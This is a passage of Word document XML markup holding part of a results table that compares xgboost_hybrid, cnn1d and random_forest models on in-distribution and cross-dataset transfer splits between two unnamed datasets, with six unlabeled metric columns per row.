        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.532</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.767</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost_hybrid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset2→dataset1 (transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.779</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.766</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.168</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.276</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.686</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost_hybrid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset2→dataset2 (in-dist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.924</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.851</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.846</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.049</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.848</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.968</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cnn1d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset1→dataset1 (in-dist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.929</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.841</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.881</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.056</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.860</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.975</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cnn1d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset1→dataset2 (transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.703</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.441</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.697</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.295</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.540</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.770</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cnn1d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset2→dataset1 (transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.792</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.787</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.232</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.359</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.733</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cnn1d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset2→dataset2 (in-dist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.916</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.812</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.866</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.067</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.838</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.964</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>random_forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset1→dataset1 (in-dist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.907</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.878</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.728</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.034</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.796</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.940</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>random_forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset1→dataset2 (transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.752</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.504</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.526</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.173</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.515</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
